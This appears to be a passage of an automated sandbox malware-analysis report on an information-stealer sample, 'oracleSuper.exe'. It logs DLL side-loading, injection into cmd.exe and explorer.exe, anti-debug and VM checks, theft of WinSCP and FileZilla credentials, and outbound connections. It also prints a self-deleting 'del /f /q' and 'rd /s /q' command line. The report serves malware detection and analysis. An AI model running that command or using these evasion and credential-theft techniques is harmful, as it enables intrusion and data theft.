Source: Binary string: wntdll.pdb source: oracleSuper.exe, 00000000.00000002.2192439487.0000000003AE0000.00000004.00000800.00020000.00000000.sdmp, oracleSuper.exe, 00000000.00000002.2192732992.0000000003E92000.00000004.00000001.00020000.00000000.sdmp, oracleSuper.exe, 00000000.00000002.2191941536.0000000003787000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171386304.000000000287E000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171686522.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2196426125.0000000002F65000.00000004.00000001.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195892526.000000000285E000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2196118649.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407126483.0000000005060000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2406823080.0000000004C17000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541837942.000000000B900000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541001928.0000000000BFA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: msidcrl40.pdb source: livecall.exe, livecall.exe, 00000003.00000002.2196853032.0000000027501000.00000020.00000001.01000000.0000000A.sdmp, msidcrl40.dll.0.dr, msidcrl40.dll.2.dr
Source: Binary string: msidcrl40.pdbL source: oracleSuper.exe, 00000000.00000002.2192910487.000000000417D000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171954674.0000000027501000.00000020.00000001.01000000.00000008.sdmp, livecall.exe, 00000003.00000002.2196853032.0000000027501000.00000020.00000001.01000000.0000000A.sdmp, msidcrl40.dll.0.dr, msidcrl40.dll.2.dr
Source: Binary string: livecall.pdb source: oracleSuper.exe, 00000000.00000002.2192910487.000000000417D000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, livecall.exe, 00000002.00000002.2170312412.0000000000401000.00000020.00000001.01000000.00000007.sdmp, livecall.exe, 00000002.00000000.2165542384.0000000000401000.00000020.00000001.01000000.00000007.sdmp, livecall.exe, 00000003.00000002.2194751559.0000000000401000.00000020.00000001.01000000.00000009.sdmp, livecall.exe, 00000003.00000000.2169625734.0000000000401000.00000020.00000001.01000000.00000009.sdmp, livecall.exe.0.dr, livecall.exe.2.dr
Source: Binary string: livecall.pdbl source: oracleSuper.exe, 00000000.00000002.2192910487.000000000417D000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2170312412.0000000000401000.00000020.00000001.01000000.00000007.sdmp, livecall.exe, 00000002.00000000.2165542384.0000000000401000.00000020.00000001.01000000.00000007.sdmp, livecall.exe, 00000003.00000002.2194751559.0000000000401000.00000020.00000001.01000000.00000009.sdmp, livecall.exe, 00000003.00000000.2169625734.0000000000401000.00000020.00000001.01000000.00000009.sdmp, livecall.exe.0.dr, livecall.exe.2.dr
Source: Binary string: H:\source\source.SAM\202788\Release_wdexe_9\WX\Desktop_x86_32_VS2019\Release\WDExe.pdbi source: oracleSuper.exe
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Code function: 2_2_00424DD1 lstrcmpiW,LoadLibraryW,GetProcAddress,FreeLibrary, 2_2_00424DD1
Source: msidcrl40.dll.2.dr Static PE information: real checksum: 0xd4c1e should be: 0xcebd1
Source: msidcrl40.dll.0.dr Static PE information: real checksum: 0xd4c1e should be: 0xcebd1
Source: fru.4.dr Static PE information: real checksum: 0x0 should be: 0x3df08
Source: fru.4.dr Static PE information: section name: yuith
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Code function: 2_2_0042416C push ecx; ret 2_2_0042417F
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Code function: 2_2_00423F11 push ecx; ret 2_2_00423F24
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_27583965 push ecx; ret 3_2_27583978
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_00442015 push ecx; ret 9_2_00442028
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe File created: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe
Source: C:\Users\user\Desktop\oracleSuper.exe File created: C:\Users\user\AppData\Local\Temp\localTask_v2\msidcrl40.dll
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe File created: C:\Users\user\AppData\Roaming\localTask_v2\msidcrl40.dll
Source: C:\Users\user\Desktop\oracleSuper.exe File created: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\fru

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\cmd.exe Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\FRU
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_0043B179 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 9_2_0043B179
Source: C:\Users\user\Desktop\oracleSuper.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match File source: Process Memory Space: explorer.exe PID: 6488, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Code function: 2_2_0041B6EC 2_2_0041B6EC
Source: C:\Users\user\Desktop\oracleSuper.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Users\user\Desktop\oracleSuper.exe API/Special instruction interceptor: Address: 6D157B27
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe API/Special instruction interceptor: Address: 6D157B27
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe API/Special instruction interceptor: Address: 6D157B27
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe API/Special instruction interceptor: Address: 6D15781D
Source: C:\Windows\SysWOW64\cmd.exe API/Special instruction interceptor: Address: 6D153B97
Source: C:\Windows\SysWOW64\explorer.exe API/Special instruction interceptor: Address: 10BA317
Source: C:\Windows\SysWOW64\cmd.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\fru
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe API coverage: 0.1 %
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Code function: 2_2_0041B6EC 2_2_0041B6EC
Source: C:\Windows\SysWOW64\timeout.exe TID: 1924 Thread sleep count: 83 > 30
Source: C:\Windows\SysWOW64\explorer.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_00421443 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 9_2_00421443
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_0042E016 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 9_2_0042E016
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_0042C039 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 9_2_0042C039
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_004378FC wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 9_2_004378FC
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_0042BC98 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 9_2_0042BC98
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_004374B6 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 9_2_004374B6
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_004365F0 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,FindNextFileA,FindClose, 9_2_004365F0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_0042D690 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 9_2_0042D690
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_00436EA6 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 9_2_00436EA6
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_0042C6B5 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA, 9_2_0042C6B5
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_00429FC0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 9_2_00429FC0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_00436B15 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA, 9_2_00436B15
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Code function: 2_2_0042811D __EH_prolog3,GetSystemInfo, 2_2_0042811D
Source: explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: noreply@vmware.com0
Source: explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: http://www.vmware.com/0
Source: explorer.exe, 00000009.00000002.2541375791.000000000359F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWZx
Source: explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware, Inc.1!0
Source: explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: http://www.vmware.com/0/
Source: explorer.exe, 00000009.00000002.2541375791.0000000003537000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: explorer.exe, 00000009.00000002.2541375791.0000000003566000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.000000000359F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware, Inc.1
Source: explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware, Inc.0
Source: C:\Users\user\Desktop\oracleSuper.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\oracleSuper.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\explorer.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\oracleSuper.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Code function: 2_2_00423F48 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess, 2_2_00423F48
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Code function: 2_2_00424DD1 lstrcmpiW,LoadLibraryW,GetProcAddress,FreeLibrary, 2_2_00424DD1
Source: C:\Users\user\Desktop\oracleSuper.exe Code function: 0_2_002F89C2 mov eax, dword ptr fs:[00000030h] 0_2_002F89C2
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_0043AE1C mov eax, dword ptr fs:[00000030h] 9_2_0043AE1C
Source: C:\Users\user\Desktop\oracleSuper.exe Code function: 0_2_002F8B82 ExitProcess,ExitProcess,GetProcessHeap,RtlAllocateHeap,VirtualProtect,VirtualProtect,ExitProcess, 0_2_002F8B82
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Code function: 2_2_00423F48 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess, 2_2_00423F48
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_27583B12 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_27583B12
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_2757F388 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_2757F388
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_00441D2B memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_00441D2B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_00443EED SetUnhandledExceptionFilter, 9_2_00443EED
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_0044236F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_0044236F

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\explorer.exe Network Connect: 149.154.167.99 443 Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Network Connect: 65.21.246.249 443 Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Network Connect: 104.102.49.254 443 Jump to behavior
Source: Yara match File source: Process Memory Space: cmd.exe PID: 6808, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 6488, type: MEMORYSTR
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_00430A14 memset,memset,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,ResumeThread,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread, 9_2_00430A14
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe NtProtectVirtualMemory: Direct from: 0x6E5B2A39 Jump to behavior
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe NtQuerySystemInformation: Direct from: 0x2750631E Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe NtProtectVirtualMemory: Direct from: 0x77377B2E Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Memory written: PID: 6488 base: 10B79C0 value: 55 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Memory written: PID: 6488 base: 370008 value: 00 Jump to behavior
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_004338BA CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 9_2_004338BA
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_004337BD CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 9_2_004337BD
Source: C:\Windows\SysWOW64\cmd.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 10B79C0 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 370008 Jump to behavior
Source: C:\Users\user\Desktop\oracleSuper.exe Process created: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\SysWOW64\explorer.exe" & rd /s /q "C:\ProgramData\EBFHJEGDAFHI" & exit Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Code function: 2_2_0042482A cpuid 2_2_0042482A
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP, 2_2_00423587
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: GetLocaleInfoA, 3_2_2758E532
Source: C:\Windows\SysWOW64\explorer.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 9_2_00431D31
Source: C:\Windows\SysWOW64\explorer.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\oracleSuper.exe Queries volume information: C:\Users\user\Desktop\oracleSuper.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\oracleSuper.exe Queries volume information: C:\Users\user\AppData\Local\Temp\6942704c VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\oracleSuper.exe Code function: 0_2_002EA412 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_002EA412
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_00431BEC GetProcessHeap,HeapAlloc,GetUserNameA, 9_2_00431BEC
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_2758936D __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson, 3_2_2758936D
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Code function: 2_2_004235F1 GetVersionExA,InterlockedExchange, 2_2_004235F1
Source: C:\Windows\SysWOW64\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match File source: 9.2.explorer.exe.420000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.cmd.exe.55100c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.cmd.exe.55100c8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.2540293467.0000000000445000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2407356619.0000000005510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: cmd.exe PID: 6808, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 6488, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\fru, type: DROPPED
Source: Yara match File source: 9.2.explorer.exe.420000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.cmd.exe.55100c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.cmd.exe.55100c8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.2540293467.0000000000445000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2407356619.0000000005510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: cmd.exe PID: 6808, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 6488, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\fru, type: DROPPED
Source: C:\Windows\SysWOW64\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior

Remote Access Functionality

Source: Yara match File source: 9.2.explorer.exe.420000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.cmd.exe.55100c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.cmd.exe.55100c8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.2540293467.0000000000445000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2407356619.0000000005510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: cmd.exe PID: 6808, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 6488, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\fru, type: DROPPED
Source: Yara match File source: 9.2.explorer.exe.420000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.cmd.exe.55100c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.cmd.exe.55100c8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.2540293467.0000000000445000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2407356619.0000000005510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: cmd.exe PID: 6808, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 6488, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\fru, type: DROPPED